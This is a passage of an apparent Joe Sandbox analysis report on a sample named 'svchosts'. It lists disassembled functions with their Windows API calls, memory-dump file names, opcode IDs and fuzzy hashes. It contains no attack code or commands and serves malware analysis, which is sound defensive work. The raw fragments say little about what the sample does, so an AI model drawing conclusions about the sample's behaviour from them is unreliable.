                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      • Opcode ID: 1c5d84a2d4835a84b3865c11bb0684359a9f5b9ea3a8bfcea2cf1d13c6636230
                                                                      • Instruction ID: 72b4dd17c04cd2e91a2fdee7028c9f304dbaf9c763e90a0afc9fe981946f0851
                                                                      • Opcode Fuzzy Hash: 1c5d84a2d4835a84b3865c11bb0684359a9f5b9ea3a8bfcea2cf1d13c6636230
                                                                      • Instruction Fuzzy Hash: E25135709202069EDB228F31C890AFBBBF5FF41350F18846ED09687253D7B99951CB91
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00291385
                                                                        • Part of subcall function 00296057: __EH_prolog.LIBCMT ref: 0029605C
                                                                        • Part of subcall function 0029C827: __EH_prolog.LIBCMT ref: 0029C82C
                                                                        • Part of subcall function 0029C827: new.LIBCMT ref: 0029C86F
                                                                        • Part of subcall function 0029C827: new.LIBCMT ref: 0029C893
                                                                      • new.LIBCMT ref: 002913FE
                                                                        • Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 4167b1bc14558ecf5770c420aa78a7f1ee7149859a625b4dab55fe8211a5903d
                                                                      • Instruction ID: d8bd76b9adbcf1c815f6c118637498ce1055b8e10828559540200e99356a8923
                                                                      • Opcode Fuzzy Hash: 4167b1bc14558ecf5770c420aa78a7f1ee7149859a625b4dab55fe8211a5903d
                                                                      • Instruction Fuzzy Hash: A84137B0815B419EEB24DF7984859E7FBE5FF19300F504A6ED5EE83282CB326564CB11
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00291385
                                                                        • Part of subcall function 00296057: __EH_prolog.LIBCMT ref: 0029605C
                                                                        • Part of subcall function 0029C827: __EH_prolog.LIBCMT ref: 0029C82C
                                                                        • Part of subcall function 0029C827: new.LIBCMT ref: 0029C86F
                                                                        • Part of subcall function 0029C827: new.LIBCMT ref: 0029C893
                                                                      • new.LIBCMT ref: 002913FE
                                                                        • Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 93a72dc6adee79fb86bc3a52b76b58faf6e55780dbe54b80611733ca3e307339
                                                                      • Instruction ID: 9c2fff408029473d7cb7ae897377feb9259ab14c916a591e046c6c5486a6922e
                                                                      • Opcode Fuzzy Hash: 93a72dc6adee79fb86bc3a52b76b58faf6e55780dbe54b80611733ca3e307339
                                                                      • Instruction Fuzzy Hash: C74146B0815B419EEB24DF798485AE7FBE5FF19300F504A6ED1EE83282CB326564CB11
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00299EDC,?,?,00297867), ref: 002997A6
                                                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00299EDC,?,?,00297867), ref: 002997DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 73e49aaa65b35e7039cca6937c5545bc53ccb4888276ea828d66aadfec0603d4
                                                                      • Instruction ID: 0ff2239f9bc839ef74f7336c9f2144a2bc1cc4c2142880bb5a9ffad172756a59
                                                                      • Opcode Fuzzy Hash: 73e49aaa65b35e7039cca6937c5545bc53ccb4888276ea828d66aadfec0603d4
                                                                      • Instruction Fuzzy Hash: D52104B1420749AFDB308FA8C885BE7B7E8EB49764F00492DF1E582191C775AC948A20
                                                                      APIs
                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00297547,?,?,?,?), ref: 00299D7C
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00299E2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: File$BuffersFlushTime
                                                                      • String ID:
                                                                      • API String ID: 1392018926-0
                                                                      • Opcode ID: 3560a998af900b6aa9d85420142ba19aaf34f15c26de62e51deb666e16dc85c7
                                                                      • Instruction ID: 0b5100724108830eb468e0d3e1343cd57f0a83dcefe150c963846e26f18fd16a
                                                                      • Opcode Fuzzy Hash: 3560a998af900b6aa9d85420142ba19aaf34f15c26de62e51deb666e16dc85c7
                                                                      • Instruction Fuzzy Hash: C121F632168346AFCB10EF29C8D1EABBBE8AF52718F04481CB4C183141D729DA5CCB71
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 002BA4B8
                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002BA4C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                      • String ID:
                                                                      • API String ID: 2279764990-0
                                                                      • Opcode ID: 23c1c83912eb3b6ab38342dd411e31a9d43d691e5401d0d4e86b30f7d8972e93
                                                                      • Instruction ID: 07a0e20e47e83f6d75c758c6d689492f601f3f9a886c5aa2206b84a47a5986af
                                                                      • Opcode Fuzzy Hash: 23c1c83912eb3b6ab38342dd411e31a9d43d691e5401d0d4e86b30f7d8972e93
                                                                      • Instruction Fuzzy Hash: 8511CA33A315229B9F25DE28FC48CEA73B9AB843A07164120FD15EB254EA74DC61C6D2
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00299B35,?,?,00000000,?,?,00298D9C,?), ref: 00299BC0
                                                                      • GetLastError.KERNEL32 ref: 00299BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 18815b0be196d0519d4ec921be7cff6f4d40abd0940c162a1263b4297b4a48c5
                                                                      • Instruction ID: 863dfd71156ffd27f962d22655bb1b702c9160875369f2de5d004613e4a0bf7b
                                                                      • Opcode Fuzzy Hash: 18815b0be196d0519d4ec921be7cff6f4d40abd0940c162a1263b4297b4a48c5
                                                                      • Instruction Fuzzy Hash: 910108723352069F8F08CE6DBCB497EB399AFC0335B14852DF81687280CA79DC959A21
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00299E76
                                                                      • GetLastError.KERNEL32 ref: 00299E82
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 1ab38a5372686268387dd5de6459cf31ef3d4e2e5fa678fb4630d510a3631161
                                                                      • Instruction ID: 838e61350c8b1b082260cc33c0d0ee2d792faf3b6a0c0d63e8d74f3a56aa0062
                                                                      • Opcode Fuzzy Hash: 1ab38a5372686268387dd5de6459cf31ef3d4e2e5fa678fb4630d510a3631161
                                                                      • Instruction Fuzzy Hash: 2401B5727252015FEF34DE2DDC48B6BB7D99B88325F14493FB186C3690DA71DC988610
                                                                      APIs
                                                                      • _free.LIBCMT ref: 002B8627
                                                                        • Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A
                                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,002D0F50,0029CE57,?,?,?,?,?,?), ref: 002B8663
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocAllocate_free
                                                                      • String ID:
                                                                      • API String ID: 2447670028-0
                                                                      • Opcode ID: 729e3f735648cfed2199b75b676b905e3109a5fec31f1099a44dfe8a181ea252
                                                                      • Instruction ID: 7b033424e063fadf82873df7b8422ba9004938139e13f320a6e38a0085f712bb
                                                                      • Opcode Fuzzy Hash: 729e3f735648cfed2199b75b676b905e3109a5fec31f1099a44dfe8a181ea252
                                                                      • Instruction Fuzzy Hash: A1F0C231131116A6CB212E25AC04FEB276C9FD17F0F288115F82C96191DE30CC30D9A5
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 002A0915
                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 002A091C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Process$AffinityCurrentMask
                                                                      • String ID:
                                                                      • API String ID: 1231390398-0
                                                                      • Opcode ID: 26de1b5670051edf7facca5621e3b0a8be2fe6260f92f808a6b4c853fd997d9d
                                                                      • Instruction ID: 781d2612a4c8072fc038a87682ecd225cc591cf9d0f9b8c5b63b98d5590ca13d
                                                                      • Opcode Fuzzy Hash: 26de1b5670051edf7facca5621e3b0a8be2fe6260f92f808a6b4c853fd997d9d
                                                                      • Instruction Fuzzy Hash: 11E09233A2010BAB6F09DEA4AC489FB739DEB0A71472085B9A807D3201FD31DE1186A1
                                                                      APIs
                                                                        • Part of subcall function 002BB610: GetEnvironmentStringsW.KERNEL32 ref: 002BB619
                                                                        • Part of subcall function 002BB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BB63C
                                                                        • Part of subcall function 002BB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BB662
                                                                        • Part of subcall function 002BB610: _free.LIBCMT ref: 002BB675
                                                                        • Part of subcall function 002BB610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BB684
                                                                      • _free.LIBCMT ref: 002B79FD
                                                                      • _free.LIBCMT ref: 002B7A04
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                      • String ID:
                                                                      • API String ID: 400815659-0
                                                                      • Opcode ID: 2ec86c4aecc2524341ce6886498497bf873ba5084af54a1613b3e0eba12093a4
                                                                      • Instruction ID: f54b2e9292e4de6cfc22f2d5114f055947006c325c1558179d4a0b7403323780
                                                                      • Opcode Fuzzy Hash: 2ec86c4aecc2524341ce6886498497bf873ba5084af54a1613b3e0eba12093a4
                                                                      • Instruction Fuzzy Hash: B9E0E512939816459762767A2D026EF02088BC13F1B501726F914DB0C2DE908C320555
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A458
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0029A27A,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A489
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 87c35bb939708bfdd2a18440073fd74ba44740a9158349825f24a036b50d927b
                                                                      • Instruction ID: cd9e4f02515e320503b019c7149e6d72d70c3a2d789b0535344b567098354c85
                                                                      • Opcode Fuzzy Hash: 87c35bb939708bfdd2a18440073fd74ba44740a9158349825f24a036b50d927b
                                                                      • Instruction Fuzzy Hash: E8F0303225020DBBDF129F60EC45FEA776CBB04785F448051BC8896161DB769AB9AE90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText_swprintf
                                                                      • String ID:
                                                                      • API String ID: 3011073432-0
                                                                      • Opcode ID: 28f81db731cc45a7271acc89310d3b31a2f8e20683e5bcbe70580fd49933e0d3
                                                                      • Instruction ID: c5fa6015bc7c7e2575a1d1146302f94f0e982f2724806ae700f43e82cacd5673
                                                                      • Opcode Fuzzy Hash: 28f81db731cc45a7271acc89310d3b31a2f8e20683e5bcbe70580fd49933e0d3
                                                                      • Instruction Fuzzy Hash: A0F05C719203487BEF11ABB09C06FAE375CAB06741F000592B605530A2DE716E309F61
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,?,0029984C,?,?,00299688,?,?,?,?,002C1FA1,000000FF), ref: 0029A13E
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0029984C,?,?,00299688,?,?,?,?,002C1FA1,000000FF), ref: 0029A16C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 19d458f844575f608eca95960aadf79194f778eb3fc0597d5fd1ae3701532c85
                                                                      • Instruction ID: ed594f9133982934168b1c1dcb59d08ccfe5acd070fa8d7da42c884f90dfc509
                                                                      • Opcode Fuzzy Hash: 19d458f844575f608eca95960aadf79194f778eb3fc0597d5fd1ae3701532c85
                                                                      • Instruction Fuzzy Hash: 99E092756502096BDF119F70EC45FF977ACBB08381F484065B888C3060DB629DA4AE90
                                                                      APIs
                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,002C1FA1,000000FF), ref: 002AA3D1
                                                                      • OleUninitialize.OLE32(?,?,?,?,002C1FA1,000000FF), ref: 002AA3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: GdiplusShutdownUninitialize
                                                                      • String ID:
                                                                      • API String ID: 3856339756-0
                                                                      • Opcode ID: fd939c6d4c2577d98243868bfb10aab5d7bc5477c967add384ed07cede84f89c
                                                                      • Instruction ID: a03766cbf9bc87b8b149522d8b7c2ce54d8ca0260903a14278bbc89c4c75879a
                                                                      • Opcode Fuzzy Hash: fd939c6d4c2577d98243868bfb10aab5d7bc5477c967add384ed07cede84f89c
                                                                      • Instruction Fuzzy Hash: 2EF03072558654DFC710DB4CEC05B55FBA8FB4AB20F04436AF41983761CB746C11CA91
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,0029A189,?,002976B2,?,?,?,?), ref: 0029A1A5
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0029A189,?,002976B2,?,?,?,?), ref: 0029A1D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 34f26c0bab6bbb85d7eb17ec93b71d0a3aa5cf2b223099fc356ccb15b541802c
                                                                      • Instruction ID: ebca456e83c486170f97233b209d1774a7611ec1da4ebca3eff1a4fa3cb5bdf4
                                                                      • Opcode Fuzzy Hash: 34f26c0bab6bbb85d7eb17ec93b71d0a3aa5cf2b223099fc356ccb15b541802c
                                                                      • Instruction Fuzzy Hash: 29E09B3651011857CF11EB64DC05FD5775CAB083E1F0041A2FD48D3190D7719D549AD0
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2
                                                                      Memory Dump Source
